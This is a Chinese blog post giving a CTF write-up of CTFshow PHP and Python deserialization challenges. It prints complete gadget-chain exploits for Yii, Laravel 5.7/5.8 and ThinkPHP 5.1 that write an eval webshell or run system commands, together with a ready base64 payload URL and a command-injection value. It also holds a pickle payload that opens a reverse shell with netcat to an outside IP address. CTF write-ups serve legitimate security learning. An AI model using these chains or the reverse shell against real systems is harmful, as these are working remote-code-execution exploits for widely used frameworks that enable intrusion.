[CTF]CTFSHOW反序列化

最新推荐文章于 2024-06-15 09:15:49 发布
最新推荐文章于 2024-06-15 09:15:49 发布
阅读量3.7k 收藏
点赞数
分类专栏: CTF 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sapphire037/article/details/122533238
版权

265

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
    public function login(){
        return $this->token===$this->password;
    }
}

$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand());

if($ctfshow->login()){
    echo $flag;
}

在这里token的值是随机且不能爆破的,所以需要一点小方法,在PHP中的引用:
PHP 的引用允许你用两个变量来指向同一个内容

<?php
    $a="ABC";
    $b =&$a;
    echo $a;//这里输出:ABC
    echo $b;//这里输出:ABC
    $b="EFG";//$a="EFG"输出也一样
    echo $a;//这里$a的值变为EFG 所以输出EFG
    echo $b;//这里输出EFG
?>

所以可以这样构造

<?php
error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct(){
        $this->token='123';
        $this->password = &$this->token;
    }
    public function login(){
        return $this->token===$this->password;
    }
}

$ctfshow = unserialize($_GET['ctfshow']);
$a=new ctfshowAdmin();
echo serialize($a);

这样的话就可以保证token=password,也就满足了获得flag的条件.

266

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

highlight_file(__FILE__);

include('flag.php');
$cs = file_get_contents('php://input');


class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
        return $this->username===$this->password;
    }
    public function __toString(){
        return $this->username;
    }
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
    throw new Exception("Error $ctfshowo",1);
}

可以看到,要想获得flag,就得触发__destruct方法,而下面的preg_match会匹配ctfshow,如果$cs中有ctfshow就会报错,不能触发,但是这里过滤并不严格,因为php的类名是不区别大小写的,所以可以大写绕过。但是我直接hackbar传不行,得在bp改,如下
在这里插入图片描述
O:7:"Ctfshow":2:{s:8:"username";s:3:"123";s:8:"password";s:3:"123";}

267

进去是一个页面
在这里插入图片描述
about页面发现有提示
在这里插入图片描述
没懂,看视频,yii框架,访问/?r=site/about&view-source得到反序列化点
在这里插入图片描述
url?r=/backdoor/shell&code=poc
用网上的链子打

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'shell_exec';
            $this->id = "echo '<?php eval(\$_POST[1]);phpinfo();?>' > /var/www/html/basic/web/1.php";
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

访问1.php然后就是随便来了

268 269 270

还是yii的框架,但是上一条链子不能用了,换一条试试

<?php
namespace yii\rest {
    class Action
    {
        public $checkAccess;
    }
    class IndexAction
    {
        public function __construct($func, $param)
        {
            $this->checkAccess = $func;
            $this->id = $param;
        }
    }
}
namespace yii\web {
    abstract class MultiFieldSession
    {
        public $writeCallback;
    }
    class DbSession extends MultiFieldSession
    {
        public function __construct($func, $param)
        {
            $this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];
        }
    }
}
namespace yii\db {
    use yii\base\BaseObject;
    class BatchQueryResult
    {
        private $_dataReader;
        public function __construct($func, $param)
        {
            $this->_dataReader = new \yii\web\DbSession($func, $param);
        }
    }
}
namespace {
    $exp = new \yii\db\BatchQueryResult('shell_exec', "echo '<?php eval(\$_POST[1]);phpinfo();?>' > /var/www/html/basic/web/1.php");
    echo(base64_encode(serialize($exp)));
}

和上一题一样

271

<?php

/**
 * Laravel - A PHP Framework For Web Artisans
 *
 * @package  Laravel
 * @author   Taylor Otwell <taylor@laravel.com>
 */

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| our application. We just need to utilize it! We'll simply require it
| into the script here so that we don't have to worry about manual
| loading any of our classes later on. It feels great to relax.
|
*/

require __DIR__ . '/../vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Turn On The Lights
|--------------------------------------------------------------------------
|
| We need to illuminate PHP development, so let us turn on the lights.
| This bootstraps the framework and gets it ready for use, then it
| will load up this application so that we can run it and send
| the responses back to the browser and delight our users.
|
*/

$app = require_once __DIR__ . '/../bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/

$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);
$response = $kernel->handle(
    $request = Illuminate\Http\Request::capture()
);
@unserialize($_POST['data']);
highlight_file(__FILE__);

$kernel->terminate($request, $response);

Laravel5.7反序列化漏洞,网上就有链子直接打,这两天找个时间单独跟一次。

<?php

namespace Illuminate\Foundation\Testing {
    class PendingCommand
    {
        public $test;
        protected $app;
        protected $command;
        protected $parameters;

        public function __construct($test, $app, $command, $parameters)
        {
            $this->test = $test;                 //一个实例化的类 Illuminate\Auth\GenericUser
            $this->app = $app;                   //一个实例化的类 Illuminate\Foundation\Application
            $this->command = $command;           //要执行的php函数 system
            $this->parameters = $parameters;     //要执行的php函数的参数  array('id')
        }
    }
}

namespace Faker {
    class DefaultGenerator
    {
        protected $default;

        public function __construct($default = null)
        {
            $this->default = $default;
        }
    }
}

namespace Illuminate\Foundation {
    class Application
    {
        protected $instances = [];

        public function __construct($instances = [])
        {
            $this->instances['Illuminate\Contracts\Console\Kernel'] = $instances;
        }
    }
}

namespace {
    $defaultgenerator = new Faker\DefaultGenerator(array("hello" => "world"));

    $app = new Illuminate\Foundation\Application();

    $application = new Illuminate\Foundation\Application($app);

    $pendingcommand = new Illuminate\Foundation\Testing\PendingCommand($defaultgenerator, $application, 'system', array('tac /flag'));

    echo urlencode(serialize($pendingcommand));
}

272 273

Laravel5.8

<?php
namespace Illuminate\Broadcasting
{
    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;
    class PendingBroadcast
    {
        protected $events;
        protected $event;

        public function __construct()
        {
            $this->events = new Dispatcher();
            $this->event = new QueuedCommand();
        }

    }
}

namespace Illuminate\Foundation\Console
{
    class QueuedCommand
    {
        public $connection = 'tac ../../../flag';
    }
}

namespace Illuminate\Bus
{

    class Dispatcher
    {
        protected $queueResolver;

        public function __construct()
        {
            $this->queueResolver='system';
        }

    }
}

namespace
{

    use Illuminate\Broadcasting\PendingBroadcast;

    echo urlencode(serialize(new PendingBroadcast()));
}

传值用bp。

273

ThinkPHP5.1的反序列化漏洞,F12可以看到
在这里插入图片描述

<?php
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        $this->append = ["lin"=>["calc.exe","calc"]];
        $this->data = ["lin"=>new Request()];
    }
}
class Request
{
    protected $hook = [];
    protected $filter = "system";
    protected $config = [
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>'lin'];
        $this->hook = ["visible"=>[$this,"isAjax"]];
    }
}


namespace think\process\pipes;

use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;

use think\Model;

class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>

http://939e506d-fe4b-4458-94c0-149554bc9c0d.challenge.ctf.show/?lin=tac /f*&data=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czozOiJsaW4iO2E6Mjp7aTowO3M6ODoiY2FsYy5leGUiO2k6MTtzOjQ6ImNhbGMiO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJsaW4iO086MTM6InRoaW5rXFJlcXVlc3QiOjM6e3M6NzoiACoAaG9vayI7YToxOntzOjc6InZpc2libGUiO2E6Mjp7aTowO3I6OTtpOjE7czo2OiJpc0FqYXgiO319czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjtzOjk6IgAqAGNvbmZpZyI7YToxOntzOjg6InZhcl9hamF4IjtzOjM6ImxpbiI7fX19fX19

275

终于不是框架了

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-08 19:13:36
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-08 20:08:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


highlight_file(__FILE__);

class filter{
    public $filename;
    public $filecontent;
    public $evilfile=false;

    public function __construct($f,$fn){
        $this->filename=$f;
        $this->filecontent=$fn;
    }
    public function checkevil(){
        if(preg_match('/php|\.\./i', $this->filename)){
            $this->evilfile=true;
        }
        if(preg_match('/flag/i', $this->filecontent)){
            $this->evilfile=true;
        }
        return $this->evilfile;
    }
    public function __destruct(){
        if($this->evilfile){
            system('rm '.$this->filename);
        }
    }
}

if(isset($_GET['fn'])){
    $content = file_get_contents('php://input');
    $f = new filter($_GET['fn'],$content);
    if($f->checkevil()===false){
        file_put_contents($_GET['fn'], $content);
        copy($_GET['fn'],md5(mt_rand()).'.txt');
        unlink($_SERVER['DOCUMENT_ROOT'].'/'.$_GET['fn']);
        echo 'work done';
    }
    
}else{
    echo 'where is flag?';
}

where is flag?

传的$fn将会变成filename,逻辑自己看吧,只需要filecontent的内容含有flag即可,system内可以命令注入fn=;tac /f*,post一个flag就行

277 278

查看源代码:
where is flag?<!--/backdoor?data= m=base64.b64decode(data) m=pickle.loads(m) -->
pickle反序列化。
首先要了解什么是pickle反序列化,pickle是python的一个库,可以时间数据的序列化和反序列化,我觉得这篇文章已经分析得很详细了。
这里其实可以直接打印出结果,但是不知道为什么不回显

# import pickle
# import base64
# import os
#
#
# class payload(object):
# 	def __reduce__(self):
# 		return (eval,("__import__('os').popen('ls').read()",))
#
# a = pickle.dumps(payload(),protocol=0)
# a=base64.b64encode(a)
# print(a)

那么就反弹shell,构造:

import pickle
import base64
class payload(object):
	def __reduce__(self):
		return(eval,('__import__("os").popen("nc 81.71.85.60 5000 -e /bin/sh").read()',))
a=payload()
test=pickle.dumps(a)
print(base64.b64encode(test))

拿到flag

Sapphire037
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
ctf.show-web-1000题
weixin_46079186的博客
12-07 5812
信息收集 爆破 命令执行 文件包含 php特性 文件上传 sql注入 反序列化 java 代码审计 phpCVE XSS nodejs jwt SSRF SSTI XXE 区块链安全 黑盒测试
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5645
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
反序列化漏洞实例解析:CTF挑战中的技巧与策略
最新发布
weixin_43822401的博客
06-15 571
反序列化漏洞通常发生在应用程序接收序列化对象时,未能正确验证或清理输入数据,导致恶意构造的序列化数据被不当还原为对象,可能触发代码执行或其他安全问题。
CTFshow web入门——爆破
小元砸的博客
01-24 4678
web 21 一.涉及工具: burp suit burp suit 使用教程 二.解题思路: 1.随便输一个密码和用户名抓包一下 2.base64解密一下发现账号密码的形式为 账号:密码,根据题目提示我们用自定义迭代器爆破,使用方法参考:Custom iterator的使用 注:下面爆破用的字典是题目所提供的 3.爆破出结果 web 22 一.涉及知识点: 子域名爆破(此题不能爆破出来)在线子域名爆破 二.解题思路: 直接点开View Hint(提示)即可得到答案 web 23 一.涉及工具: p
ctfshow php特性系列
xiaolong22333的博客
04-18 4265
文章目录web89web90web91web92web93web94web95web96web97web98 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)
PHP渗透测试题目笔记
Zeker62的博客
02-10 5528
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
CTF(Capture The Flag)竞赛中,编程者经常面临各种挑战,其中“反序列化”是一种常见的安全漏洞利用方式。第九题的标题暗示我们需要理解并利用PHP反序列化机制来解决这个问题。PHP是一种广泛使用的服务器端...
浅析PHP反序列化中过滤函数使用不当导致的对象注入问题
12-20
然而,如果在反序列化过程中处理不当,尤其是使用过滤函数时,可能会引发对象注入漏洞。本文将深入探讨这种问题的原因、影响以及示例分析。 首先,让我们理解序列化和反序列化的概念。序列化是将一个对象转化为字符...
Shiro反序列化流量分析.pdf
05-10
4. 解密后的数据会被反序列化,如果存在可利用的反序列化 gadget,那么恶意代码将被执行。 【AES加密与解密】 AES(Advanced Encryption Standard)是一种常用的对称加密算法。在Shiro的反序列化漏洞中,AES用于...
攻防世界序列化问题详解.md
09-12
攻防世界,序列化问题
CTFSHOW WEB入门——爆破
Chur的博客
09-16 787
WEB入门——爆破 BP
bugku web9 flag In the variable !
PRCORANGE的博客
04-07 423
题目: flag In the variable ! <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args
ctf.show WEB入门-代码审计
~airrudder~
11-30 4359
ctfshow 代码审计篇 web301-web310
ctfshow-web爆破(web21-28)
m0_50268414的博客
11-29 1364
ctfshow-web爆破(web21-28)(updating) 文章目录ctfshow-web爆破(web21-28)(updating)web21 burp爆破web22 子域名web23 MD5web24 伪随机数web25 php mtrand()随机数生成漏洞web26 抓包web27 学生信息泄露+身份证号爆破web28 目录爆破 web21 burp爆破 题目 爆破什么的,都是基操 解 跟爆破相关,直接使用burp,因为win上的burp突然挂了,只能用kali上的先用一波,打开抓包,提
CTFPHP相关题目考点总结(二)
weixin_68789096的博客
06-24 1116
本篇文章主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。
CTFshow——PHP特性(下)
D.MIND 的博客
02-21 1952
目录:web132——逻辑运算符的优先级web133——curl -Fweb134——php变量覆盖web135—— >xx.txt 写文件web136—— tee命令 web132——逻辑运算符的优先级 打开是一个网站,访问robots.txt 得到指引/admin <?php #error_reporting(0); include("flag.php"); highlight_file(__FILE__); if(isset($_GET['username']) &&
ctfshow web入门 序列化
Lumos427的博客
02-25 1381
序列化和反序列化 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt
ctfshow php特性[125-135]
weixin_44770698的博客
01-16 1202
ctfshow php特性125-135
ctf php反序列化
06-07
CTF中的PHP反序列化攻击主要针对使用PHPWeb应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列化数据来触发漏洞,从而实现攻击的目的。 在实际攻击中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值